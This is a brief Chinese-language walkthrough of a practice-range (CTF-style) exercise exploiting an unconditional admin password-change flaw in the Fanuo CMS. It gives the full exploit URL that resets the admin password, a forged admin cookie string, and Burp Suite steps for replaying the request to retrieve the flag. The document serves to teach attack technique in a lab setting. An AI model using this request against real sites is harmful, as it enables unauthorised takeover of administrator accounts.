靶场地址:
https://www.mozhe.cn/bug/detail/VkFCM3lXb0t5dFBNNkVLQVlvbFltQT09bW96aGUmozhe
凡诺无条件修改密码漏洞
漏洞url:
/admin/cms_admin_edit.php?id=1&a_name=admin&a_password=aa123456&a_cpassword=aa123456&a_tname=%E7%AE%A1%E7%90%86%E5%91%98&save=%E4%BF%9D%E5%AD%98
修改cookies:
admin_name=admin; CNZZDATA5812519=cnzz_eid%3D1713769080-1488341730-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1488341730; DedeUserID=1; DedeUserID__ckMd5=ce751456d8f71150; DedeLoginTime=1488376931; DedeLoginTime__ckMd5=24434bd5e85042a9; PHPSESSID=vq3e1oaaef54908udspb3tvkn3
burp suite访问url并拦截,修改cookies后点击forward,然后就可以修改密码了
修改后在/admin/cms_admin.php处查看网页源代码,发现key
网友评论